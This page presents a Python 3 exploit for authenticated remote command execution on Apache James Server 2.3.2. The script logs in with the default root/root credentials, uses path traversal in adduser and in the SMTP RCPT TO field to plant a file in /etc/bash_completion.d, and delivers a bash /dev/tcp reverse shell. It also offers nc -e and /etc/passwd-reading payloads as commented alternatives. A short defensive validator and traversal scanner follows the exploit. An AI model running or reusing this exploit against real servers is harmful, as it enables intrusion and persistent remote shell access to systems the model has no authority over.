Applies to a default installation of Apache James Server 2.3.2; the account and password are root / root.
The solidstate practice VM is also affected, but a shell cannot be obtained directly there.
Apache James: Apache James, abbreviated James, stands for Java Apache Mail Enterprise Server. James is a 100% Java-based e-mail server. It is a standalone mail server that provides a complete e-mail solution for receiving and sending mail.
Apache James Server 2.3.2 remote command execution (RCE)
# Exploit Title: Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)
# Date: 27/09/2021
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d

'''
This Python 3 implementation is based on the original (Python 2) exploit code developed by [author not named on this page]. The following modifications were made:
1 - Made required changes to print and socket commands for Python 3 compatibility.
2 - Changed the default payload to a basic bash reverse shell script and added a netcat option.
3 - Changed the command line syntax to allow user input of remote ip, local ip and listener port to correspond with #2.
4 - Added a payload that can be used for testing remote command execution and connectivity.
5 - Added payload and listener information output based on payload selection and user input.
6 - Added execution output clarifications and additional informational comments throughout the code.

@shinris3n
https://twitter.com/shinris3n
https://shinris3n.github.io/
'''

#!/usr/bin/python3
import socket
import sys
import time

# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

if len(sys.argv) != 4:
    sys.stderr.write("[-]Usage: python3 %s <remote ip> <local ip> <local listener port>\n" % sys.argv[0])
    sys.stderr.write("[-]Example: python3 %s 172.16.1.66 172.16.1.139 443\n" % sys.argv[0])
    sys.stderr.write("[-]Note: The default payload is a basic bash reverse shell - check script for details and other options.\n")
    sys.exit(1)

remote_ip = sys.argv[1]
local_ip = sys.argv[2]
port = sys.argv[3]

# Select payload prior to running script - default is a reverse shell executed upon any user logging in (i.e. via SSH)
payload = '/bin/bash -i >& /dev/tcp/' + local_ip + '/' + port + ' 0>&1'  # basic bash reverse shell, executes after user login
print(payload)  # e.g. /bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
#payload = 'nc -e /bin/sh ' + local_ip + ' ' + port # basic netcat reverse shell
#payload = 'echo $USER && cat /etc/passwd && ping -c 4 ' + local_ip # test remote command execution capabilities and connectivity
#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # proof of concept exploit on root user login only

print("[+]Payload Selected (see script for more options): ", payload)
if '/bin/bash' in payload:
    print("[+]Example netcat listener syntax to use after successful execution: nc -lvnp", port)

def recv(s):
    s.recv(1024)
    time.sleep(0.2)

try:
    print("[+]Connecting to James Remote Administration Tool...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((remote_ip, 4555))  # Assumes James Remote Administration Tool is running on Port 4555, change if necessary.
    s.recv(1024)
    s.send((user + "\n").encode('utf-8'))
    s.recv(1024)
    s.send((pwd + "\n").encode('utf-8'))
    s.recv(1024)
    print("[+]Creating user...")
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n".encode('utf-8'))
    s.recv(1024)
    s.send("quit\n".encode('utf-8'))
    s.close()

    print("[+]Connecting to James SMTP server...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((remote_ip, 25))  # Assumes default SMTP port, change if necessary.
    s.send("ehlo team@team.pl\r\n".encode('utf-8'))
    recv(s)
    print("[+]Sending payload...")
    s.send("mail from: <'@team.pl>\r\n".encode('utf-8'))
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n".encode('utf-8')) if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n".encode('utf-8'))
    recv(s)
    s.send("data\r\n".encode('utf-8'))
    recv(s)
    s.send("From: team@team.pl\r\n".encode('utf-8'))
    s.send("\r\n".encode('utf-8'))
    s.send("'\n".encode('utf-8'))
    s.send((payload + "\n").encode('utf-8'))
    s.send("\r\n.\r\n".encode('utf-8'))
    recv(s)
    s.send("quit\r\n".encode('utf-8'))
    recv(s)
    s.close()
    print("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).")
    if '/bin/bash' in payload:
        print("[+]Don't forget to start a listener on port", port, "before logging in!")
except Exception as e:
    print("Connection failed.")
    print(e)
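The weakness the script above relies on is that James 2.3.2 turns the name given to adduser, and later the recipient local part, into a directory name without rejecting path separators or "..". As an added defensive example (not code from the exploit author or the James project), the validator below rejects such names and the scanner flags them in constructed sample lines; the "<source> <message>" line format is an assumption, not real James log output.

```python
import re

# Constructed sample lines in a simplified "<source> <message>" shape. These are
# NOT real James log output; they only exercise the checks below.
SAMPLE_LINES = [
    "remotemanager adduser alice s3cret",
    "remotemanager adduser ../../../../../../../../etc/bash_completion.d exploit",
    "smtp rcpt to: <bob@example.org>",
    "smtp rcpt to: <../../../../../../../../etc/bash_completion.d>",
]

# In James 2.3.x the username doubles as a directory name inside the mail
# repository, so a safe name must contain no '/', '\\', ':' or whitespace and
# no parent-directory reference.
SAFE_CHARS = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def is_safe_username(name: str) -> bool:
    """True only for names that cannot escape the repository directory."""
    if not SAFE_CHARS.fullmatch(name):
        return False
    return ".." not in name and not name.startswith(".")


def extract_username(line: str):
    """Pull the user-controlled name out of an adduser or RCPT TO line."""
    m = re.search(r"adduser\s+(\S+)", line)
    if m:
        return m.group(1)
    m = re.search(r"rcpt to:\s*<([^>@]+)(?:@[^>]*)?>", line, re.IGNORECASE)
    if m:
        return m.group(1)
    return None


def find_traversal_attempts(lines):
    """Return (name, line) pairs whose name would fail validation."""
    hits = []
    for line in lines:
        name = extract_username(line)
        if name is not None and not is_safe_username(name):
            hits.append((name, line))
    return hits


if __name__ == "__main__":
    for name, line in find_traversal_attempts(SAMPLE_LINES):
        print("[!] unsafe repository name %r in: %s" % (name, line))
```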